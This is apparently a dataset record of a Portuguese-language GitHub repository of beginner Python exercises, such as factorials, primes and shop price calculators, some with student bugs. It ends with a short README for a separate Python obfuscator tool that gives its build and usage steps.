fatorial de um número inteiro fornecido pelo usuário. 
Ex.: 5!=5.4.3.2.1=120\n\"\"\"\n\n\"\"\"f=lambda x :x if x<=2 else x*f(x-1)\n\nprint(f(5))\"\"\"\n\nnumero = int(input(\"Digite um número: \"))\ncount1 = 0\ncount = 1\nwhile count1 < numero:\n fatorial = numero * (numero - count)\n count = count - 1\n count1 = count + 1\n\nprint(fatorial)" }, { "alpha_fraction": 0.668181836605072, "alphanum_fraction": 0.6727272868156433, "avg_line_length": 23.55555534362793, "blob_id": "6e21dbf5be150bacf82efa4dea77e681bc96620a", "content_id": "a25e8b44da642513d1d69a23cb981f3e27e8fe8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/Ex 007.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que peça um valor e mostre na tela se o valor é positivo ou negativo.\n\"\"\"\n\nvalor = float(input('Entre com um valor: '))\n\nif valor > 0:\n print('Valor é positivo')\nelse:\n print('Valor é negativo')" }, { "alpha_fraction": 0.6690140962600708, "alphanum_fraction": 0.7259389758110046, "avg_line_length": 39.5, "blob_id": "13c2ba6f0706aa99891db8e7d29ecfc21d112299", "content_id": "5f4133f68ef21e0dfab4555603c064437efab968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1725, "license_type": "no_license", "max_line_length": 314, "num_lines": 42, "path": "/EX 004.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada. Considere que a cobertura da tinta é de 1 litro para cada 6 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam R$ 80,00 ou em galões de 3,6 litros, que custam R$ 25,00.\nInforme ao usuário as quantidades de tinta a serem compradas e os respectivos preços em 3 situações:\ncomprar apenas latas de 18 litros;\ncomprar apenas galões de 3,6 litros;\nmisturar latas e galões, de forma que o desperdício de tinta seja menor. 
Acrescente 10% de folga e sempre arredonde os valores para cima, isto é, considere latas cheias.\"\"\"\n\nimport math\n\nprint\n'Calculo para verificar quantas latas/galões de tintas serão necessarias e o valor delas'\n\nMETROS = int(input('Entre com a quantidade a ser pintada: '))\n\nMETROSLATAS = METROS / 6\nif (METROSLATAS <= 0):\n METROSLATAS = 1\n\nQTDLATAS18 = math.floor(METROSLATAS / 18 + (18 * 0.10))\nQTDGALOES36 = math.floor(METROSLATAS / 3.6 + (3.6 * 0.10))\nQTDLATAS = METROSLATAS / 18\nRESTO = METROSLATAS % 18\n\nif (RESTO > 0 and RESTO <= 3.6):\n QTDGALOES = 1\nelif (RESTO == 0):\n QTDGALOES = 0\nelse:\n QTDGALOES = math.floor(RESTO / 3.6 + (3.6 * 0.10))\n\nif (QTDLATAS18 <= 0 or QTDGALOES36 <= 0 or QTDGALOES < 0):\n QTDGALOES36 = 1\n QTDLATAS18 = 1\n QTDGALOES = 1\n\nPRECOLATAS18 = QTDLATAS18 * 80\nPRECOGALOES36 = QTDGALOES36 * 25\nPRECOLATAS = QTDLATAS * 80\nPRECOGALOES = QTDGALOES * 25\n\nPRECOTIMO = PRECOLATAS + PRECOGALOES\n\nprint('Quantidade de latas: ',QTDLATAS18,'PREÇO LATAS:', PRECOLATAS18, 'Quantidade galoes: ', QTDGALOES36,'PREÇO GALOES:',PRECOGALOES36,'Solução Otima, latas: e galões:',QTDLATAS, QTDGALOES, PRECOTIMO)\n\n\n\n" }, { "alpha_fraction": 0.6618497371673584, "alphanum_fraction": 0.6734104156494141, "avg_line_length": 33.70000076293945, "blob_id": "51427f026c527d353d3f13e88d6cb1ead2a5c69a", "content_id": "a8861a77b6bbd742a8856551b9abaf59f577c9f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 113, "num_lines": 10, "path": "/Ex 029.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um numero e informe se ele é inteiro ou decimal. Utilize função de arredondamento\"\"\"\n\nnum = float(input('Digite um numero: '))\n\nif num == round(num):\n print('Número inteiro...')\nelse:\n print('Decimal ')\n print('Arredondando para baixo: ', round(num-0.5))\n print('Arredondando para cima: ', round(num+0.5))" }, { "alpha_fraction": 0.6199095249176025, "alphanum_fraction": 0.6357465982437134, "avg_line_length": 29.714284896850586, "blob_id": "3c39057182b8f5f890b0bbf820ca144db4e08ee3", "content_id": "5d64e2634de9eadc5d3f90f57fd9b9e782e68c67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 166, "num_lines": 14, "path": "/Ex 052.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça um número inteiro e determine se ele é ou não um número primo. 
Um número primo é aquele que é divisível somente por ele mesmo e por 1.\"\"\"\r\n\r\n\r\nnumero = int(input(\"Digite um numero: \"))\r\ndivisores = 0\r\nfor divisor in range(1, numero):\r\n if numero % divisor == 0:\r\n divisores = divisores + 1\r\n if divisores > 1:\r\n break\r\nif divisores > 1:\r\n print(\"não é primo\")\r\nelse:\r\n print(\"é primo\")" }, { "alpha_fraction": 0.6291497945785522, "alphanum_fraction": 0.6963562965393066, "avg_line_length": 38.80644989013672, "blob_id": "d9f3b4c34cee0fce07ea65285028837bbf1d3331", "content_id": "f59a3a4caa8f843fd33245a162cbf4b3ffca6fa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "no_license", "max_line_length": 360, "num_lines": 31, "path": "/Ex 026.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa para um caixa eletrônico. O programa deverá perguntar ao usuário a valor do saque e depois informar quantas notas de cada valor serão fornecidas. As notas disponíveis serão as de 1, 5, 10, 50 e 100 reais. O valor mínimo é de 10 reais e o máximo de 600 reais. O programa não deve se preocupar com a quantidade de notas existentes na máquina.\nExemplo 1: Para sacar a quantia de 256 reais, o programa fornece duas notas de 100, uma nota de 50, uma nota de 5 e uma nota de 1;\nExemplo 2: Para sacar a quantia de 399 reais, o programa fornece três notas de 100, uma nota de 50, quatro notas de 10, uma nota de 5 e quatro notas de 1.\"\"\"\n\n\nprint('Valor minimo para saque: 10, minímo: 600')\nnumero = int(input('Digite o valor do saque: '))\n\nwhile (numero < 10) or (numero > 600):\n print('Valor inválido')\n numero = int(input('Digite novamente: '))\n\ncem = int(numero / 100)\nnumero = numero % 100\n\ncinquenta = int(numero / 50)\nnumero = numero % 50\n\ndez = int(numero / 10)\nnumero = numero % 10\n\ncinco = int(numero / 5)\nnumero = numero % 5\n\num = numero\n\nprint('Notas R$100,00 = ', cem)\nprint('Notas R$ 50,00 = ', cinquenta)\nprint('Notas R$ 10,00 = ', dez)\nprint('Notas R$ 5,00 = ', cinco)\nprint('Notas R$ 1,00 = ', um)\n\n" }, { "alpha_fraction": 0.6108986735343933, "alphanum_fraction": 0.6434034705162048, "avg_line_length": 32.74193572998047, "blob_id": "374c35e2243b4c26e79bf536a1ed11072383d287", "content_id": "59c92a5650d6e497f1aa1e248dfdbfe906edc072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 185, "num_lines": 31, "path": "/Ex 019.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que lê as duas notas parciais obtidas por um aluno numa disciplina ao longo de um semestre, e calcule a sua média. 
A atribuição de conceitos obedece à tabela abaixo:\n Média de Aproveitamento Conceito\n Entre 9.0 e 10.0 A\n Entre 7.5 e 9.0 B\n Entre 6.0 e 7.5 C\n Entre 4.0 e 6.0 D\n Entre 4.0 e zero E\nO algoritmo deve mostrar na tela as notas, a média, o conceito correspondente e a mensagem “APROVADO” se o conceito for A, B ou C ou “REPROVADO” se o conceito for D ou E.\"\"\"\n\nnota1=float(input(\"Digite nota 1: \"))\nnota2=float(input(\"Digite nota 2: \"))\n\nmedia=(nota1+nota2)/2\n\nif media >=9:\n conceito = \"A\"\nelif media >= 7.5:\n conceito = \"B\"\nelif media >= 6:\n conceito = \"C\"\nelif media >= 4:\n conceito = \"D\"\nelse: # Não é necessário utilizar o elif já que só resta uma opção\n conceito = \"E\"\n\nresultado = \"Aprovado!\"\n\nif media <= 4:\n resultado = \"Reprovado\"\n\nprint('Notas: ', nota1, nota2, 'Media: ', media, 'Conceito: ', conceito, 'Resultado:', resultado)\n" }, { "alpha_fraction": 0.6379310488700867, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 13.75, "blob_id": "e799198139b5caa995642a9ee1370a0011287fd7", "content_id": "e31cdf0a5350d7c0634fafe5bc9060b00f476ca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 23, "num_lines": 4, "path": "/Ex 027.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"teste git hub\"\"\"\n\ncambio = ('Alo cambio')\nprint(cambio)" }, { "alpha_fraction": 0.5861126184463501, "alphanum_fraction": 0.6123564839363098, "avg_line_length": 43.63414764404297, "blob_id": "1cef3b811da12b3039735ed51ab03f94cea381ac", "content_id": "9246f32e1d878a1e3ebd16e91f83c6f0641c4555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 505, "num_lines": 41, "path": "/Ex 033.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"O Hipermercado Tabajara está com uma promoção de carnes que é imperdível. Confira:\n Até 5 Kg Acima de 5 Kg\nFile Duplo R$ 4,90 por Kg R$ 5,80 por Kg\nAlcatra R$ 5,90 por Kg R$ 6,80 por Kg\nPicanha R$ 6,90 por Kg R$ 7,80 por Kg\nPara atender a todos os clientes, cada cliente poderá levar apenas um dos tipos de carne da promoção, porém não há limites para a quantidade de carne por cliente. Se compra for feita no cartão Tabajara o cliente receberá ainda um desconto de 5% sobre o total da compra. Escreva um programa que peça o tipo e a quantidade de carne comprada pelo usuário e gere um cupom fiscal, contendo as informações da compra: tipo e quantidade de carne, preço total, tipo de pagamento, valor do desconto e valor a pagar.\n\"\"\"\n\ntp = input('Qual o tipo de carne deseja comprar: (a)->File duplo; (b)--> Alcatra, (c)-->Picanha')\nqt = float(input('Qual a quantidade de carne a ser comprada: '))\ntbj = input('Compra feita com cartao Tabajara? 
(s/n): ').lower()\n\np_total = 0\nv_desconto = 0\nv_a_pagar = 0\n\nif tp == 'a':\n if qt < 5:\n p_total = (qt * 4.90)\n else:\n p_total = (qt * 5.80)\nif tp == 'b':\n if qt < 5:\n p_total = (qt * 5.90)\n else:\n p_total = (qt * 6.80)\nif tp == 'c':\n if qt < 5:\n p_total = (qt * 6.90)\n else:\n p_total = (qt * 7.80)\n\nif tbj == 's':\n v_desconto = (p_total * 0.05)\nelse:\n p_total = p_total\n\nv_a_pagar = p_total - v_desconto\n\n#tipo e quantidade de carne, preço total, tipo de pagamento, valor do desconto e valor a pagar.\nprint('Cupom fiscal...','\\n', 'TIPO: ', tp.title(),'\\n', 'QUANTIDADE: ', qt,'\\n', 'PREÇO TOTAL: ', p_total,'\\n', 'TIPO DE PAGAMENTO: ', 'Cartão tabajara?', tbj,'\\n', 'VALOR DO DESCONTO: ', v_desconto,'\\n', 'VALOR A PAGAR: ', v_a_pagar)" }, { "alpha_fraction": 0.6117886304855347, "alphanum_fraction": 0.6483739614486694, "avg_line_length": 36.69230651855469, "blob_id": "e9e920e8b564d4a77a076c8c7c8bdadc6dda8de2", "content_id": "c438e9fabeb3a03bbaa583d1ecdfc90f32f5fd0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/Ex 011.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia três números e mostre o maior deles.\n\"\"\"\n\nnum_1 = float(input('Entre com o primeiro numero: '))\nnum_2 = float(input('Entre com o segundo numero: '))\nnum_3 = float(input('Entre com o terceiro numero: '))\n\nif num_1 > num_2 and num_1 > num_3:\n print('O primeiro numero é o maior', num_1)\nelif num_2 > num_1 and num_2 > num_3:\n print('O segundo numero e o maior ', num_2)\nelif num_3 > num_1 and num_3 > num_2:\n print('O terceiro numero é o maior.', num_3)\n\n\n" }, { "alpha_fraction": 0.6839826703071594, "alphanum_fraction": 0.6839826703071594, "avg_line_length": 37.41666793823242, "blob_id": "b8b7806beadb65af7b6e50b7cfad41f4a85927de", "content_id": "33d44c8db1898786a83dbcdbb20ff06a82cb6af3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 177, "num_lines": 12, "path": "/Ex 035.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia um nome de usuário e a sua senha e não aceite a senha igual ao nome do usuário, mostrando uma mensagem de erro e voltando a pedir as informações.\"\"\"\n\n\nnome = input('Entre com o nome: ')\nsenha = input('Entre com uma senha: ')\n\nwhile nome == senha:\n print('ERRO: o usuario nao pode ser igual a senha.')\n nome = input('Entre com o nome: ')\n senha = input('Entre com uma senha: ')\nelse:\n print('Cadastro feito com sucesso')\n\n" }, { "alpha_fraction": 0.582245409488678, "alphanum_fraction": 0.6057441234588623, "avg_line_length": 18.200000762939453, "blob_id": "f6ce40b8c8ab3d93b4c9e3985416dd48846c0048", "content_id": "5fb8945a54f1e7316d23fb6ccafe51e1f0f3bc00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/Ex 040.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que leia 5 números e informe o maior número.\"\"\"\n\n#com while\nmaior = -99\ni = 1\nwhile i <= 5:\n wnumero = int(input('Informe um numero: '))\n if wnumero > maior:\n maior = wnumero\n i += 1\nprint(maior)\n\n#com for\n\nmairo = -99\nfor i in 
range (5):\n fnumero = int(input('Informe um numero: '))\n if fnumero > mairo:\n mairo = fnumero\nprint(mairo)" }, { "alpha_fraction": 0.5061349868774414, "alphanum_fraction": 0.6104294657707214, "avg_line_length": 22.285715103149414, "blob_id": "6d0af1b2b25d08f38f07f39a71bfff15b1933a82", "content_id": "ebb2a0294d8758767eac75af9e57025ce0fd9964", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 148, "num_lines": 14, "path": "/Ex 048.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"A série de Fibonacci é formada pela seqüência 0,1,1,2,3,5,8,13,21,34,55,... Faça um programa que gere a série até que o valor seja maior que 500.\n\"\"\"\n\nlista = []\nu1 = 1\nu2 = 1\ncount = 0\nfor i in range (0, 13):\n count = u1 + u2\n u1 = count\n u2 = count - u2\n lista.append(count)\n #if count > 500:\nprint(lista)\n" }, { "alpha_fraction": 0.5552115440368652, "alphanum_fraction": 0.5706914067268372, "avg_line_length": 35.346153259277344, "blob_id": "001a1f5d47be22316bd6776f6000d4052a03735b", "content_id": "f2e02ef461de78e689433cb8d862de1899460ce8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 127, "num_lines": 26, "path": "/Ex 053.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa de cálculo dos números primos, informando, caso o número não seja primo, por quais número ele é divisível.\r\n\"\"\"\r\n\r\n\r\nnum = int(input(\"Digite um numero: \"))\r\nlista = []\r\nif num < 2: # 0 e 1 não são primos, e vou desconsiderar os números negativos\r\n print('não é primo')\r\nelif num == 2: # 2 é o único número par que é primo\r\n print('primo')\r\nelif num % 2 == 0: # se for par e não é 2, não é primo\r\n print('não é primo')\r\n for i in range(1,num+1):\r\n if num % i == 0:\r\n lista.append(i)\r\n print(f'Os n° {num} é divisível por {lista}')\r\nelse: # aqui eu sei que o número é ímpar # só testo se é divisível por números ímpares\r\n for i in range(1, num + 1, 2):\r\n if num % i == 0:\r\n lista.append(i)\r\n print('não é primo')\r\n print(lista)\r\n break # não é primo, interrompe o for\r\n print(f'Os n° {num} é divisível por {lista}')\r\n else:\r\n print('é primo')" }, { "alpha_fraction": 0.6384891867637634, "alphanum_fraction": 0.6753597259521484, "avg_line_length": 40.22222137451172, "blob_id": "56d6c020e5cd346dcae49b952bfd6b60bf5d8b1c", "content_id": "52a98cb5380645ed2ebafd4acf5fad673c9f13e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 321, "num_lines": 27, "path": "/Ex 031.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Um posto está vendendo combustíveis com a seguinte tabela de descontos:\nÁlcool:\naté 20 litros, desconto de 3% por litro\nacima de 20 litros, desconto de 5% por litro\nGasolina:\naté 20 litros, desconto de 4% por litro\nacima de 20 litros, desconto de 6% por litro Escreva um algoritmo que leia o número de litros vendidos, o tipo de combustível (codificado da seguinte forma: A-álcool, G-gasolina), calcule e imprima o valor a ser pago pelo cliente sabendo-se que o preço do litro da gasolina é R$ 2,50 o preço do litro do álcool é R$ 1,90.\n\"\"\"\n\nl_vendidos = float(input('Quantos litros foram vendidos? 
: '))\ncomb = input('Qual é o tipo de combustível? (alcooll = a, gasolina = g): ').lower()\np_litros = 0\n\nif comb == 'a':\n p_litros = 1.90\n if l_vendidos <= 20:\n l_vendidos = l_vendidos - (l_vendidos*0.03)\n else:\n l_vendidos = l_vendidos - (l_vendidos*0.05)\nelse:\n p_litros = 2.50\n if l_vendidos <= 20:\n l_vendidos = l_vendidos - (l_vendidos*0.04)\n else:\n l_vendidos = l_vendidos - (l_vendidos*0.06)\npreço = l_vendidos*p_litros\nprint('Preço a pagar é: ', preço,\"R$\")" }, { "alpha_fraction": 0.8297872543334961, "alphanum_fraction": 0.8297872543334961, "avg_line_length": 22.5, "blob_id": "10ca3a4fe6507cdc3856dfb65d6137d61c8f0406", "content_id": "b5d7aaa35340ed3adae66de311f1d3b9133cfd50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "# Exercicios-py\nSolved WikipythonBR exercises.\n" }, { "alpha_fraction": 0.7016128897666931, "alphanum_fraction": 0.7145161032676697, "avg_line_length": 37.8125, "blob_id": "0c7aeceb190092a2324f96b27ac245cc81ec5f29", "content_id": "2fb2e1dc22223cdfd41b455ba4b52dff020cadfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 631, "license_type": "no_license", "max_line_length": 137, "num_lines": 16, "path": "/Ex 010.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa para a leitura de duas notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e apresentar:\nA mensagem \"Aprovado\", se a média alcançada for maior ou igual a sete;\nA mensagem \"Reprovado\", se a média for menor do que sete;\nA mensagem \"Aprovado com Distinção\", se a média for igual a dez.\"\"\"\n\nparcial_1 = float(input('Entre com a primeira nota parcial: '))\nparcial_2 = float(input('Entre com a segunda nota parcial: '))\n\nmedia = (parcial_1 + parcial_2) / 2\n\nif media == 10:\n print('Aprovado com distinção')\nelif media >= 7:\n print('Aprovado')\nelse:\n print('Reprovado')" }, { "alpha_fraction": 0.560773491859436, "alphanum_fraction": 0.6298342347145081, "avg_line_length": 23.066667556762695, "blob_id": "c7071416b0ce77c996049781aa9afda196e7b0d9", "content_id": "6dc9bc44a7da7c0f1adfe2219922e36e42d299e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 137, "num_lines": 15, "path": "/Ex 047.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"A série de Fibonacci é formada pela seqüência 1,1,2,3,5,8,13,21,34,55,... 
Faça um programa capaz de gerar a série até o n−ésimo termo.\n\"\"\"\n\nn = int(input('Entre com um numero para a sequencia Fibonacci: '))\n\nlista = []\nu1 = 1\nu2 = 1\ncount = 0\nfor i in range (0, n):\n count = u1 + u2\n u1 = count\n u2 = count - u2\n lista.append(count)\nprint(lista)\n\n" }, { "alpha_fraction": 0.676982581615448, "alphanum_fraction": 0.6943907141685486, "avg_line_length": 21.478260040283203, "blob_id": "3c9de3500af04cd2f5504ad6c81dfbb5f9d0552f", "content_id": "eafb4f30811c93c3ec0eef4cd051a52da4b7bc55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/Ex 014.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia três números e mostre-os em ordem decrescente.\n\"\"\"\n\nn1 = float(input('Entre n1: '))\nn2 = float(input('Entre n2: '))\nn3 = float(input('Entre nc: '))\n\nlista = []\nlista.append(n1)\nlista.append(n2)\nlista.append(n3)\nlista_decrescente = sorted(lista, reverse=True)\nprint(lista_decrescente)\n\n#também funciona\n\nlista_com_for = []\nqnt = 3\nfor i in range(qnt):\n elemento = int(input('Digite um numero: '))\n lista_com_for.append(elemento)\nlista_com_for.sort(reverse=True)\nprint(lista_com_for)\n" }, { "alpha_fraction": 0.5675146579742432, "alphanum_fraction": 0.5988258123397827, "avg_line_length": 24.600000381469727, "blob_id": "3b8ccee5985c0795a6e5f54867e00cd2d2559de4", "content_id": "34c688bd575d4969470fb2e7ea3e10b19ab7d3bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 517, "license_type": "no_license", "max_line_length": 165, "num_lines": 20, "path": "/Ex 018.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia um número e exiba o dia correspondente da semana. (1-Domingo, 2- Segunda, etc.), se digitar outro valor deve aparecer valor inválido.\"\"\"\n\nnum = int(input('Qual o numero? 
'))\n\nif num == 1:\n print('1 = Domingo')\nelif num == 2:\n print('2 = Segunda')\nelif num == 3:\n print('3 = Terça')\nelif num == 4:\n print('4 = Quarta')\nelif num == 5:\n print('5 = Quinta')\nelif num == 6:\n print('6 = Sexta')\nelif num == 7:\n print('7 = Sábado')\nelse:\n print('Valor inválido...')" }, { "alpha_fraction": 0.673285186290741, "alphanum_fraction": 0.6895306706428528, "avg_line_length": 38.64285659790039, "blob_id": "20c8bf9296f70690fcb550759d1b3e2461b88d6a", "content_id": "9ca16e45ea84133df9b23f592112fe31c6d8f588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 172, "num_lines": 14, "path": "/Ex 051.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa de cálculo do fatorial, permitindo ao usuário calcular o fatorial várias vezes e limitando o fatorial a números inteiros positivos e menores que 16.\"\"\"\n\nimport math\nlista = []\ncount = 0\n\nqnt = int(input('Digite a quantidade de numeros que deseja entrar: '))\nwhile qnt != count:\n numero = float(input(\"Digite um numero: \"))\n while numero // 1 != numero or numero < 0 or 0 or numero < 16:\n numero = float(input(\"Digite um número[erro]: \"))\n\n print(\"Fatorial do número digitado: \", math.factorial(numero))\n count += 1" }, { "alpha_fraction": 0.6728813648223877, "alphanum_fraction": 0.6813559532165527, "avg_line_length": 20.814815521240234, "blob_id": "77d66875a60529bbb4fb634cd51d12abb165c3a4", "content_id": "a9488602d66726bb8df1f3a0692682d03e1173bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 171, "num_lines": 27, "path": "/Ex 045.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um programa que peça dois números, base e expoente, calcule e mostre o primeiro número elevado ao segundo número. Não utilize a função de potência da linguagem.\"\"\"\n\nprint(\"base ^ expoente:\")\nbase=int(input(\"Base: \"))\nexpoente=int(input(\"Expoente: \"))\n\npotencia=1\ncount=1\n\nwhile count <= expoente:\n potencia *= base\n count +=1\n\nprint(base,\"^\",expoente,\"=\",potencia)\n\n#for\nprint(\"base ^ expoente:\")\nbase=int(input(\"Base: \"))\nexpoente=int(input(\"Expoente: \"))\n\npotencia=1\n\nfor count in range(expoente):\n potencia *= base\n count += 1\n\nprint(base,\"^\",expoente,\"=\",potencia)\n\n" }, { "alpha_fraction": 0.5511904954910278, "alphanum_fraction": 0.6380952596664429, "avg_line_length": 39.0476188659668, "blob_id": "94a87fe720b261c3b639cba506a4caf1308f0737", "content_id": "a2885ec23342020078e2dae301f98173b8ae3077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 126, "num_lines": 21, "path": "/Ex 024.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Faça um Programa que leia um número inteiro menor que 1000 e imprima a quantidade de centenas, dezenas e unidades do mesmo.\nObservando os termos no plural a colocação do \"e\", da vírgula entre outros. 
Exemplo:\n326 = 3 centenas, 2 dezenas e 6 unidades\n12 = 1 dezena e 2 unidades Testar com: 326, 300, 100, 320, 310,305, 301, 101, 311, 111, 25, 20, 10, 21, 11, 1, 7 e 16\"\"\"\n\nnum = (input('Numero: '))\nnum_str = str(num)\nqt_num = len(num_str)\n\nif qt_num == 3:\n centena = num_str[0:1]\n dezena = num_str[1:2]\n unidade = num_str[2:3]\n print(num_str, '=', 'centena', centena, 'dezena', dezena, 'unidades', unidade)\nif qt_num == 2:\n dezena = num_str[0:1]\n unidade = num_str[1:2]\n print(num_str, '=', 'dezena', dezena, 'unidades', unidade)\nif qt_num == 1:\n unidade = num_str[0:1]\n print(num_str, '=', 'unidade', unidade)" }, { "alpha_fraction": 0.6723602414131165, "alphanum_fraction": 0.6847826242446899, "avg_line_length": 48.53845977783203, "blob_id": "de8d5e5a60fec32012658a4354a95b23cc0f34c2", "content_id": "c08a12bc74e5b1863ce03b3bd68be660552dc74c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 653, "license_type": "no_license", "max_line_length": 159, "num_lines": 13, "path": "/Ex 038.py", "repo_name": "0xJinbe/Exercicios-py", "src_encoding": "UTF-8", "text": "\"\"\"Altere o programa anterior permitindo ao usuário informar as populações e as taxas de crescimento iniciais. Valide a entrada e permita repetir a operação\"\"\"\n\ncidade_a = int(input('Entre com a população da primeira cidade: '))\ncidade_b = int(input('Entre com a população da segunda cidade: '))\nano = 0\ntx_a = float(input('Entre com a primeira taxa de crescimento (em %): '))\ntx_b = float(input('Entre com a segunda taxa de crescimento(em %): '))\n\nwhile cidade_a <= cidade_b:\n cidade_a += (cidade_a*tx_a)/100\n cidade_b += (cidade_b*tx_b)/100\n ano += 1\n print(f\"A pop da cidade a {cidade_a}, a pop cidade b {cidade_b} o ano {ano}\")\n" } ]
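Several of the factorial attempts in this collection (Ex 050, Ex 051, Ex 062) circle the same iterative loop but mishandle the counters. Below is a minimal sketch of the pattern they are aiming for, assuming the input has already been validated as a non-negative integer; the names are illustrative and not taken from the files.

```python
# Iterative factorial: the loop Ex 050/051/062 attempt.
# Assumes n is already a validated non-negative int (Ex 051's input checks would wrap this).
def fatorial(n):
    resultado = 1
    for fator in range(2, n + 1):  # empty range for n < 2, so 0! == 1! == 1
        resultado *= fator
    return resultado

assert fatorial(5) == 120  # 5! = 5.4.3.2.1 = 120, as the docstrings state
```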
53
NADKennyTung/PythonObfuscated
https://github.com/NADKennyTung/PythonObfuscated
0f73271072dcf670341dccd5f315558070cfc4dc
95c99a684f169f70e4d0a0f8a0d610afd9be86ed
fd66208b79d93066d3c1483b9f2e865b2923c0dd
refs/heads/master
2023-08-22T07:33:46.958163
2021-09-24T04:02:59
2021-09-24T04:02:59
392,018,637
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7489986419677734, "alphanum_fraction": 0.7610146999359131, "avg_line_length": 73.9000015258789, "blob_id": "99e2760dee14cefb75cf9d4c3d7a3a2a177f2878", "content_id": "76c7cde9725d5687533f13f4c91cefb59cb4de81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 749, "license_type": "no_license", "max_line_length": 154, "num_lines": 10, "path": "/README.md", "repo_name": "NADKennyTung/PythonObfuscated", "src_encoding": "UTF-8", "text": "# FunnyProtector\nStrong Python Obfuscator & Protector\n\n- Removed pieces of needless code (website module, check user acc, print obfuscating process)\n- Removed obfuscate string that can generate error: string2replace = \"Cipher(\\\"\"+StringEncrypt(string.replace(\"\\\"\",\"\"))+\"\\\")\"\n- How to use this tool:\n+ Gen protector dll passwd: Open _protector.sln in folder, assign const wchar_t* good = 'string key' then build (x86 to gen protector32, x64 to protector)\n+ Set protector dll passwd in python script: assign result = mydll.Xoring(code,'string key')\n+ Run script: python funnyprotector.py then input your path 